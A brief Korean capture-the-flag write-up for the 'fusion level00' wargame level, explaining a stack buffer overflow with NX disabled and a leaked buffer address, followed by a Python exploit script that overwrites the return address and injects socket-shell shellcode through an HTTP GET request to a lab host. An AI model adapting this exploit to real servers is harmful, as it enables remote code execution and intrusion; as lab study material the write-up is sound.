fusion level00

간단한 bof 였다. NX가 걸려있지 않고 버퍼의 주소를 알기 때문에 쉘코드를 사용했다. 다만 realpath라는 함수의 용도를 모르겠어서 약간 헤멨었다.

from SunKn0wn import *
 
r = remote('192.168.179.151', 20000)
r.recvuntil('at 0x')
buf = int(r.recv(8), 16)
print "[*]buffer addr : " + str(hex(buf))
payload = 'A' * 139
payload += p32(buf + 144)
payload += SocketShell32
payload = 'GET ' + payload + ' HTTP/1.1'
r.recvsend(payload)
r.interactive()